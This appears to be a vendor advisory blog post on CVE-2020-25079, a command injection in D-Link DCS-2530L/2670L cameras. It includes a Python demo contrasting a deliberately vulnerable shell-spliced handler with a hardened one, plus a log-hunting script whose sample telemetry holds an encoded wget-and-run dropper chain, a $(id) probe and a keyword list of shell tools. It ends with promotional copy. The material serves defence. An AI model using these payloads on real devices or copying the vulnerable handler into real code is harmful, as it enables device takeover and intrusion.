What happened
CISA added CVE-2020-25079 to the Known Exploited Vulnerabilities (KEV) catalog, flagging active exploitation against D-Link DCS-2530L and DCS-2670L IP cameras (CISA KEV). The vulnerability is a command injection in cgi-bin/ddns_enc.cgi that lets an attacker execute arbitrary system commands through crafted input (CISA KEV). The CVE record describes it as authenticated command injection affecting DCS-2530L firmware before 1.06.01 Hotfix and DCS-2670L through 2.02, and classifies it under CWE-77, the general command-injection class (CWE-78 is the OS-command-specific variant) (NVD CVE-2020-25079).
CISA's entry notes that the impacted products could be end-of-life (EoL) or end-of-service (EoS) and advises users to discontinue use if mitigations are unavailable (CISA KEV). The CVE was added to KEV on 2025-08-05 with a federal remediation due date of 2025-08-26 under BOD 22-01 (CISA KEV). The affected hardware and CVE details are confirmed in the public records for D-Link and this identifier (MITRE CVE-2020-25079).
Why it matters
A KEV listing means exploitation has been observed in the wild, and remediation is mandatory for U.S. federal civilian executive branch agencies within the BOD 22-01 timeline (CISA KEV). For enterprises, command injection on a networked camera means device takeover, a foothold for lateral movement, and covert surveillance at the edge (NVD CVE-2020-25079). The EoL/EoS posture raises operational risk: if no vendor fix exists for a unit, the only safe move is to retire or isolate it, as CISA explicitly advises (CISA KEV).
CWE-77 flaws typically yield direct shell execution from a malformed parameter handed to a system interpreter; the requests are deterministic and easy to automate, which makes them attractive to commodity botnets and targeted actors alike (NVD CVE-2020-25079). Cameras make persistence and stealth easier: their traffic looks routine, local monitoring is scarce, and they are rarely rebooted or re-imaged, so they are high-ROI persistence points (CISA KEV).
Technical detail
Per CISA, the vulnerable component is the web-accessible script cgi-bin/ddns_enc.cgi on the DCS-2530L and DCS-2670L (CISA KEV). The weakness is command injection (CWE-77): attacker-controlled input reaches an OS command execution context, typically a shell command line assembled by string concatenation, without neutralization of shell metacharacters (NVD CVE-2020-25079). Exploitation therefore takes the form of an HTTP request to the CGI endpoint whose parameters carry metacharacters (;, |, `, $( )) or chained commands that break out of the expected value and run as additional commands (NVD CVE-2020-25079). The CVE record describes the injection as authenticated, so the request must be accompanied by valid web-interface credentials; on cameras still using default or shared credentials that is a low bar, not a real barrier.
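The pattern described above, shown as an added example that is not the D-Link firmware and not taken from the CISA or NVD records: a DDNS-style CGI handler in its vulnerable form (parameter spliced into a shell string) beside a hardened form (allowlist validation plus argv execution with no shell). The parameter name `host` and the use of `echo` as a stand-in for the device's real DDNS client are assumptions made for this demo.

```python
"""Added example of the CWE-77 pattern behind a DDNS-update CGI handler.
Not the D-Link code: the parameter name `host` and the `echo` stand-in for the
real DDNS client are assumptions made for illustration."""
import re
import subprocess
from urllib.parse import unquote


def parse_query(query: str) -> dict:
    """Minimal query-string parser: split on '&' only, percent-decode values."""
    params = {}
    for pair in query.split("&"):
        key, _, value = pair.partition("=")
        if key:
            params[unquote(key)] = unquote(value)
    return params


def vulnerable_ddns_update(query: str) -> str:
    """VULNERABLE: the attacker-controlled value is spliced into a shell string.
    ';', '|', '`' and '$( )' inside the value are interpreted by /bin/sh, so
    whatever follows the separator runs as a second command."""
    host = parse_query(query).get("host", "")
    cmd = f"echo updating {host}"  # a real handler would invoke its DDNS client here
    result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return result.stdout


# Strict allowlist: DNS labels only. No leading '-' on any label, so the value
# can never be parsed as an option by the program it is handed to
# (argument injection survives removing the shell; the allowlist closes it).
HOSTNAME_RE = re.compile(r"^(?!-)[A-Za-z0-9-]{1,63}(?:\.(?!-)[A-Za-z0-9-]{1,63})*$")


def hardened_ddns_update(query: str) -> str:
    """HARDENED: validate against the allowlist, then pass the value as one argv
    element with no shell, so metacharacters are never interpreted."""
    host = parse_query(query).get("host", "")
    if len(host) > 253 or not HOSTNAME_RE.match(host):
        raise ValueError("rejected host value: %r" % host)
    result = subprocess.run(["echo", "updating", host],
                            capture_output=True, text=True, check=True)
    return result.stdout


if __name__ == "__main__":
    payload = "host=cam.example.com;echo%20INJECTED"   # constructed request
    print("vulnerable:", repr(vulnerable_ddns_update(payload)))
    try:
        hardened_ddns_update(payload)
    except ValueError as err:
        print("hardened:", err)
    print("hardened ok:", repr(hardened_ddns_update("host=cam.example.com")))
```

The hardened variant rejects rather than "cleans" bad input: stripping metacharacters leaves room for encoding and quoting tricks, while an allowlist plus argv execution removes the interpreter from the path entirely.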
Operationally, successful exploitation can grant:
- Remote command execution with the privileges of the device's web service, which on embedded cameras is commonly root, enabling further tooling deployment (NVD CVE-2020-25079).
- Device reconfiguration, data exfiltration (video streams, stored credentials), or use as a pivot into internal networks (CISA KEV).
- Durable persistence if the attacker scripts re-entry through the same CGI path or adds startup hooks, a common pattern when CWE-77 is exploited on embedded Linux targets (NVD CVE-2020-25079).
Indicators you can hunt for include requests referencing “/cgi-bin/ddns_enc.cgi” in HTTP access logs or proxy telemetry, shell metacharacters or command-like strings in the query parameters or POST body sent to that path (including URL-encoded forms such as %3B for ;), and anomalous outbound sessions from camera IPs immediately after such requests (CISA KEV). Treat any evidence of interaction with the vulnerable CGI on these models as high-signal given the KEV status (CISA KEV).
Defense
- Mandatory action: follow CISA guidance to apply vendor mitigations where available, or discontinue use if none exist, especially for EoL/EoS units (CISA KEV).
- Federal agencies: meet the BOD 22-01 due date in the KEV entry; document and track exceptions only where strictly necessary (CISA KEV).
- Network isolation: until decommissioning, place affected cameras on dedicated VLANs with deny-by-default ACLs, and block access to the camera web interface from untrusted networks rather than filtering only the /cgi-bin/ddns_enc.cgi path, since path-level filters are bypassed by encoding and normalization variants (CISA KEV).
- Detection: add signatures for HTTP requests to “/cgi-bin/ddns_enc.cgi” and alert on any occurrence against DCS-2530L/DCS-2670L addresses (CISA KEV). Monitor for new processes and new outbound connections from these devices following CGI hits, in particular outbound fetches to unfamiliar hosts, the usual second stage of a command-injection dropper (NVD CVE-2020-25079).
- Asset control: inventory and tag all DCS-2530L/DCS-2670L units, record their firmware versions, and plan a hardware refresh for units that cannot be patched, per CISA's discontinue-use guidance for EoL/EoS (CISA KEV).
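The hunt described in the indicators and detection items above, as an added example that is not part of the original page and not derived from the CISA or NVD records: it flags every request to /cgi-bin/ddns_enc.cgi in constructed HTTP telemetry, decodes the query twice to catch double-encoding, extracts shell-breakout tokens, and correlates each hit with outbound flows from the targeted camera in the following 60 seconds. The two log formats, the addresses, the parameter name `host`, the sample payloads and the 60-second window are all constructed for this demo; none of it is the real exploit.

```python
"""Added example: hunting for ddns_enc.cgi abuse in constructed log lines and
correlating hits with follow-on outbound flows. Formats, addresses, payloads and
the window are assumptions for the demo, not the page's or CISA's data."""
import re
from datetime import datetime, timedelta
from urllib.parse import unquote

TARGET_PATH = "/cgi-bin/ddns_enc.cgi"

# Tokens that turn a parameter value into a command: separators, substitution,
# and the tooling that commodity droppers usually chain behind them.
SHELL_META = re.compile(r"\$\(|[;&|`\n]|\b(?:sh|nc|wget|curl|telnet|busybox)\b")

# Constructed formats: "<ts> <src> -> <dst> <method> <url> <status>" for HTTP
# telemetry and "<ts> <src> -> <dst>:<port> <proto>" for flow records.
HTTP_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) -> (?P<dst>\S+) "
                     r"(?P<method>[A-Z]+) (?P<url>\S+) (?P<status>\d{3})$")
FLOW_RE = re.compile(r"^(?P<ts>\S+) (?P<src>\S+) -> (?P<dst>\S+:\d+) (?P<proto>\w+)$")


def parse_ts(s: str) -> datetime:
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def ddns_cgi_hits(http_lines):
    """Every request to the KEV path, with decoded query and breakout tokens.
    Any hit is reported, even with no tokens: touching this CGI is high-signal."""
    hits = []
    for line in http_lines:
        m = HTTP_RE.match(line)
        if not m:
            continue
        path, _, query = m.group("url").partition("?")
        if path != TARGET_PATH:
            continue
        decoded = unquote(unquote(query))  # second pass catches %25XX double-encoding
        hits.append({
            "ts": parse_ts(m.group("ts")),
            "attacker": m.group("src"),
            "camera": m.group("dst"),
            "method": m.group("method"),
            "status": m.group("status"),
            "query": decoded,
            "tokens": sorted(set(SHELL_META.findall(decoded))),
        })
    return hits


def outbound_flows(flow_lines):
    flows = []
    for line in flow_lines:
        m = FLOW_RE.match(line)
        if m:
            flows.append({"ts": parse_ts(m.group("ts")), "src": m.group("src"),
                          "dst": m.group("dst"), "proto": m.group("proto")})
    return flows


def hunt(http_lines, flow_lines, window_s=60):
    """Attach to each CGI hit the new outbound sessions the targeted camera
    opened within window_s seconds afterwards (dropper fetch, reverse shell)."""
    flows = outbound_flows(flow_lines)
    window = timedelta(seconds=window_s)
    findings = []
    for hit in ddns_cgi_hits(http_lines):
        follow = [f for f in flows
                  if f["src"] == hit["camera"] and hit["ts"] <= f["ts"] <= hit["ts"] + window]
        findings.append({**hit, "followup_flows": follow})
    return findings


# Constructed sample telemetry (not real traffic).
HTTP_LOG = [
    # Plain-looking DDNS update five minutes earlier: still reported, no tokens
    "2025-08-06T10:10:00Z 198.51.100.23 -> 10.0.50.21 GET /cgi-bin/ddns_enc.cgi?host=cam1.example.com 200",
    # Dropper chain ';wget http://203.0.113.7/a.sh|sh', URL-encoded
    "2025-08-06T10:15:02Z 203.0.113.7 -> 10.0.50.21 POST /cgi-bin/ddns_enc.cgi?host=x%3Bwget%20http%3A%2F%2F203.0.113.7%2Fa.sh%7Csh 200",
    # Double-encoded $(id) probe against a second camera
    "2025-08-06T10:15:03Z 203.0.113.7 -> 10.0.50.22 GET /cgi-bin/ddns_enc.cgi?host=x%2524%2528id%2529 200",
    # Unrelated CGI on the same camera: ignored
    "2025-08-06T10:16:10Z 10.0.50.30 -> 10.0.50.21 GET /image/jpeg.cgi 200",
]
FLOW_LOG = [
    "2025-08-06T10:15:09Z 10.0.50.21 -> 203.0.113.7:80 TCP",      # fetch from attacker host, 7 s later
    "2025-08-06T10:15:40Z 10.0.50.21 -> 198.51.100.9:4444 TCP",   # new session to an unfamiliar host
    "2025-08-06T10:30:00Z 10.0.50.22 -> 10.0.50.1:53 UDP",        # far outside the window
]

if __name__ == "__main__":
    for f in hunt(HTTP_LOG, FLOW_LOG):
        print(f["ts"], f["attacker"], "->", f["camera"], f["method"], f["status"],
              "tokens=%s" % f["tokens"], "outbound=%d" % len(f["followup_flows"]))
```

Run it against your own proxy or IDS export by replacing the two regexes with your log format; keep the rule that a hit with no tokens is still reported, because on a KEV-listed path the request itself is the indicator and the token score only sets priority.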
If you find a compromised device, treat it as untrusted infrastructure: capture its traffic for forensics, rotate every credential the camera stored or authenticated with (DDNS, upload accounts, local admin passwords), and replace the hardware if no fix eliminates the injection path; a factory reset does not help when the only available firmware is the vulnerable one (CISA KEV).
Lyrie Verdict
This is a commodity-friendly, machine-speed target: a stable CGI path, deterministic payloads, and likely broad internet probing. Lyrie's autonomous sensors continuously fingerprint exposed CGI surfaces, generate safe probes for known KEV paths like /cgi-bin/ddns_enc.cgi, and correlate responses with model fingerprints to flag exploitable posture in seconds. On live traffic, Lyrie detects CWE-77 exploitation patterns (command metacharacters, shell-spawn behaviors) and can quarantine flows or isolate device MACs automatically, without waiting for human reaction time. For EoL/EoS devices where patching is off the table, Lyrie enforces network containment policies and continuous exploit-attempt suppression: practical anti-rogue-AI defense at the edge when adversaries script and iterate faster than human SOCs can respond.
Lyrie Verdict
Deterministic CGI target ideal for automated exploit loops. Lyrie auto-fingerprints /cgi-bin/ddns_enc.cgi exposure, detects CWE-77 patterns, and isolates devices at machine speed when patching isn’t possible.